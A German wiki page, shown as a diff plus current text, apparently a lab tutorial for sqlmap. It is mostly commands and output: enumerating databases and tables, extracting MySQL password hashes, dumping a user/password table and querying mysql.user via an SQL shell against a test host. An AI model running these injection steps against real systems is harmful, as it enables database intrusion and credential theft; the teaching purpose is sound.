Sqlmap Anwenden: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| (27 dazwischenliegende Versionen von 2 Benutzern werden nicht angezeigt) | |||
| Zeile 1: | Zeile 1: | ||
=Augabe aller Parameter und Optionen= | =Augabe aller Parameter und Optionen= | ||
*sqlmap -hh | *sqlmap -hh | ||
| − | =Angriff und Auflisten der | + | =Angriff und Auflisten der Datenbanken= |
| − | *sqlmap "opfer | + | *sqlmap -u "opfer/unsafe.php?search=test&submit=Suche" -dbs |
;Infos | ;Infos | ||
<pre> | <pre> | ||
| Zeile 16: | Zeile 16: | ||
[*] sql_injections | [*] sql_injections | ||
</pre> | </pre> | ||
| + | |||
=Auslesen der Tabellen der Datenbank= | =Auslesen der Tabellen der Datenbank= | ||
| − | *sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" -D sql_injections - | + | *sqlmap -u "opfer/unsafe.php?search=test&submit=Suche" -D sql_injections --tables |
| + | <pre> | ||
| + | [INFO] the back-end DBMS is MySQL | ||
| + | web server operating system: Linux Ubuntu | ||
| + | web application technology: Apache 2.4.7, PHP 5.5.9 | ||
| + | back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) | ||
| + | [17:27:23] [INFO] fetching tables for database: 'sql_injections' | ||
| + | Database: sql_injections | ||
| + | [3 tables] | ||
| + | +----------+ | ||
| + | | benutzer | | ||
| + | | my_auth | | ||
| + | | users | | ||
| + | +----------+ | ||
| + | </pre> | ||
| + | |||
| + | =Auslesen der Passwort-Hashes aus der Datenbank= | ||
| + | *sqlmap -u "opfer/unsafe.php?search=test&submit=Suche" --passwords | ||
| + | *Interaktiv kann man hier einen Dictionary-based Angriff starten | ||
| + | <pre> | ||
| + | [INFO] fetching database users password hashes | ||
| + | do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] | ||
| + | do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] n | ||
| + | database management system users password hashes: | ||
| + | [*] debian-sys-maint [1]: | ||
| + | password hash: *147B31EA7C00D57209D0EA62664670E43494DB28 | ||
| + | [*] root [1]: | ||
| + | password hash: *CDEFB1C19AA98751D4AB50F4663E52EB75052411 | ||
| + | [*] xinux [1]: | ||
| + | password hash: *62F4DA5CDA990E074B00EC1AB958B67F617E09ED | ||
| + | </pre> | ||
| + | |||
| + | =Dump der Datenbanktabellen= | ||
| + | *sqlmap -u "opfer/unsafe.php?search=test&submit=Suche" -D sql_injections --dump | ||
| + | |||
| + | =Struktur einer einzelnen Tabelle auslesen= | ||
| + | *sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" --columns -D sql_injections -T my_auth | ||
| + | <pre> | ||
| + | [INFO] fetching columns for table 'my_auth' in database 'sql_injections' | ||
| + | Database: sql_injections | ||
| + | Table: my_auth | ||
| + | [2 columns] | ||
| + | +----------+-------------+ | ||
| + | | Column | Type | | ||
| + | +----------+-------------+ | ||
| + | | user | varchar(64) | | ||
| + | | password | varchar(64) | | ||
| + | +----------+-------------+ | ||
| + | </pre> | ||
| + | |||
| + | =Daten aus einer Tabelle auslesen= | ||
| + | *sqlmap -u "opfer/unsafe.php?search=test&submit=Suche" --dump -D sql_injections -T my_auth | ||
| + | <pre> | ||
| + | [INFO] fetching entries for table 'my_auth' in database 'sql_injections' | ||
| + | Database: sql_injections | ||
| + | Table: my_auth | ||
| + | [12 entries] | ||
| + | +-----------+-----------+ | ||
| + | | user | password | | ||
| + | +-----------+-----------+ | ||
| + | | erwin | 123456 | | ||
| + | | thomas | password | | ||
| + | | otto | 12345678 | | ||
| + | | admin | 1234 | | ||
| + | | karl | letmein | | ||
| + | | sabine | 123Start$ | | ||
| + | | petra | pussy | | ||
| + | | tina | 12345 | | ||
| + | | kirstin | dragon | | ||
| + | | christine | qwerty | | ||
| + | | doris | 696969 | | ||
| + | | rudi | mustang | | ||
| + | +-----------+-----------+ | ||
| + | </pre> | ||
| + | |||
| + | =sql-Shell für Abfragen (SELECT-Query)= | ||
| + | *sqlmap -u "opfer/unsafe.php?search=test&submit=Suche" --sql-shell -D sql_injections | ||
| + | |||
| + | [17:19:20] [INFO] the back-end DBMS is MySQL | ||
| + | web server operating system: Linux Ubuntu | ||
| + | web application technology: Apache 2.4.7, PHP 5.5.9 | ||
| + | back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) | ||
| + | [17:19:20] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER | ||
| + | <span style=color:red>sql-shell> select host,user,password from mysql.user;</span> | ||
| + | [17:20:00] [INFO] fetching SQL SELECT statement query output: 'select host,user,password from mysql.user' | ||
| + | select host,user,password from mysql.user [6]: | ||
| + | [*] localhost, root, *CDEFB1C19AA98751D4AB50F4663E52EB75052411 | ||
| + | [*] opfer, root, *CDEFB1C19AA98751D4AB50F4663E52EB75052411 | ||
| + | [*] 127.0.0.1, root, *CDEFB1C19AA98751D4AB50F4663E52EB75052411 | ||
| + | [*] ::1, root, *CDEFB1C19AA98751D4AB50F4663E52EB75052411 | ||
| + | [*] localhost, debian-sys-maint, *147B31EA7C00D57209D0EA62664670E43494DB28 | ||
| + | [*] localhost, xinux, *62F4DA5CDA990E074B00EC1AB958B67F617E09ED | ||
=Aufruf des Wizards= | =Aufruf des Wizards= | ||
*geführt und interaktiv | *geführt und interaktiv | ||
*sqlmap --wizard | *sqlmap --wizard | ||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
Aktuelle Version vom 27. Oktober 2021, 14:41 Uhr
Augabe aller Parameter und Optionen
- sqlmap -hh
Angriff und Auflisten der Datenbanken
- sqlmap -u "opfer/unsafe.php?search=test&submit=Suche" -dbs
- Infos
[16:48:08] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: PHP 5.5.9, Apache 2.4.7 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [16:48:08] [INFO] fetching database names available databases [4]: [*] information_schema [*] mysql [*] performance_schema [*] sql_injections
Auslesen der Tabellen der Datenbank
- sqlmap -u "opfer/unsafe.php?search=test&submit=Suche" -D sql_injections --tables
[INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.7, PHP 5.5.9 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [17:27:23] [INFO] fetching tables for database: 'sql_injections' Database: sql_injections [3 tables] +----------+ | benutzer | | my_auth | | users | +----------+
Auslesen der Passwort-Hashes aus der Datenbank
- sqlmap -u "opfer/unsafe.php?search=test&submit=Suche" --passwords
- Interaktiv kann man hier einen Dictionary-based Angriff starten
[INFO] fetching database users password hashes
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] n
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *147B31EA7C00D57209D0EA62664670E43494DB28
[*] root [1]:
password hash: *CDEFB1C19AA98751D4AB50F4663E52EB75052411
[*] xinux [1]:
password hash: *62F4DA5CDA990E074B00EC1AB958B67F617E09ED
Dump der Datenbanktabellen
- sqlmap -u "opfer/unsafe.php?search=test&submit=Suche" -D sql_injections --dump
Struktur einer einzelnen Tabelle auslesen
- sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" --columns -D sql_injections -T my_auth
[INFO] fetching columns for table 'my_auth' in database 'sql_injections' Database: sql_injections Table: my_auth [2 columns] +----------+-------------+ | Column | Type | +----------+-------------+ | user | varchar(64) | | password | varchar(64) | +----------+-------------+
Daten aus einer Tabelle auslesen
- sqlmap -u "opfer/unsafe.php?search=test&submit=Suche" --dump -D sql_injections -T my_auth
[INFO] fetching entries for table 'my_auth' in database 'sql_injections' Database: sql_injections Table: my_auth [12 entries] +-----------+-----------+ | user | password | +-----------+-----------+ | erwin | 123456 | | thomas | password | | otto | 12345678 | | admin | 1234 | | karl | letmein | | sabine | 123Start$ | | petra | pussy | | tina | 12345 | | kirstin | dragon | | christine | qwerty | | doris | 696969 | | rudi | mustang | +-----------+-----------+
sql-Shell für Abfragen (SELECT-Query)
- sqlmap -u "opfer/unsafe.php?search=test&submit=Suche" --sql-shell -D sql_injections
[17:19:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[17:19:20] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select host,user,password from mysql.user;
[17:20:00] [INFO] fetching SQL SELECT statement query output: 'select host,user,password from mysql.user'
select host,user,password from mysql.user [6]:
[*] localhost, root, *CDEFB1C19AA98751D4AB50F4663E52EB75052411
[*] opfer, root, *CDEFB1C19AA98751D4AB50F4663E52EB75052411
[*] 127.0.0.1, root, *CDEFB1C19AA98751D4AB50F4663E52EB75052411
[*] ::1, root, *CDEFB1C19AA98751D4AB50F4663E52EB75052411
[*] localhost, debian-sys-maint, *147B31EA7C00D57209D0EA62664670E43494DB28
[*] localhost, xinux, *62F4DA5CDA990E074B00EC1AB958B67F617E09ED
Aufruf des Wizards
- geführt und interaktiv
- sqlmap --wizard